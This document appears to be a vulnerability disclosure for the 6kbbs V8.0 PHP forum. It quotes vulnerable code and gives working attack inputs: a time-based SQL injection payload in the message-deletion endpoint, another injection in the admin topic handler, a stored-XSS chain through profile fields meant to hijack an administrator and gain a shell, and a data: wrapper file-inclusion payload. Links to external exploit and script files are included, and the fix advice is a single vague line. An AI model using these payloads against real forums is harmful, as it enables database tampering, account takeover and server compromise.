6kbbs V8.0 is a high-performance forum program built with PHP + MySQL. Its strengths are concise code, convenient use, rich functionality and very fast speed.
Overall the system is UTF-8. inc/init.php simulates magic_quotes_gpc and unsets the global variables; numeric parameters are strictly filtered, and string values in SQL statements are wrapped in single quotes.
1. Time-based (delayed) injection:
ajax/member.php?action=deleteMsgs, around line 80:
    case "deleteMsgs":
        $msgids = $_POST[msgids];            // array taken from POST without any filtering
        // DELETE
        if (is_array($msgids)) {
            $delids = implode(",", $msgids); // elements are joined verbatim into the IN list
            echo "id in ($delids) and touserid = {$lg[userid]}";
            $db->row_delete("msgs", "id in ($delids) and touserid = {$lg[userid]}"); // unfortunately it is a DELETE: whatever the result, only _Y_ is returned
        }
        succeedFlag();
        break;
There is no error output, so a time-based method is forced: POST msgids[a]=if(1,sleep(10),1) and it goes straight into the query.
The executed statement is: delete from `db_msgs` WHERE id in (if(1,sleep(10),1)) and touserid = 1
The system uses md5(username.userpass. Exp:
http://www.uudisc.com/filedownload?user=k4shifz&id=3667574
2. Forum cross-site scripting:
Line 34 of ajax/member.php, which sets the user's profile information:
    case "modifyDetails":
        $user = $_POST[user];    // the received user array is not passed through htmlspecialchars
        if (getPopedom(5) == 0) {
            $user[usertitle] = "";
        }
        if ($user["email"] == "") {
            exit("Incomplete information.");
        }
        foreach (explode(",", $cache_settings[reservedkeyword]) as $rkey) {
            if (!empty($rkey) && stristr($user[usertitle], $rkey)) {
                exit("The custom title contains forbidden keywords.");
            }
        }
        $db->row_update("users", $user, "id = {$lg[userid]}"); // the whole array is saved to the database; inside the function the SQL values are enclosed in single quotes
        succeedFlag();
Forum posts are XSS-filtered, so XSS points such as the personal signature cannot be used. The breakthrough is the user edit page in the admin backend, which makes it somewhat awkward. However, the backend offers many ways to get a shell, and the script can be edited directly, so the approach is:
Register a user, modify the profile information, and wait for an administrator to edit your user in the backend; the script then obtains a shell.
Use ajax to drive the backend; the JS is here:
http://www.uudisc.com/user/k4shifz/file/3665675
Now about the backend:
The backend has many vulnerabilities: shell, local inclusion, injection, and a remote inclusion in the edit script:
admin/admin.php
......
    $inc = strFilter($_GET[inc]);
    $action = strFilter($_GET[action]);
......
    $inc = str_replace(".", "", $inc); echo $inc;   // only dots are stripped; the wrapper prefix survives
    require_once($inc . ".php");                    // remote inclusion, unfortunately only reachable in the backend
admin/admin.php?inc=data:;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4=   // phpinfo()
On PHP 5.2.0 and later this depends on allow_url_include being enabled, because the data: wrapper is treated as a URL include.
Picking one injection:
ajax/admin.php
    case "dotopics":
        try {
            $postaction = $_POST[postaction];
            $tids = $_POST[tids];
            if (empty($tids)) {
                echo("No post selected.");
                return;
            }
            if (is_array($tids)) {
                $tidstr = implode(",", $tids);   // same pattern as deleteMsgs: elements joined verbatim
                switch ($postaction) {
                    case "delPost":
                        $db->row_delete("posts", "tid in ({$tidstr}) and fid = {$fid}"); // goes straight into the query
......
Author: k4shifz, edited by emotion
Fix: patch the issues at the points identified in the code above.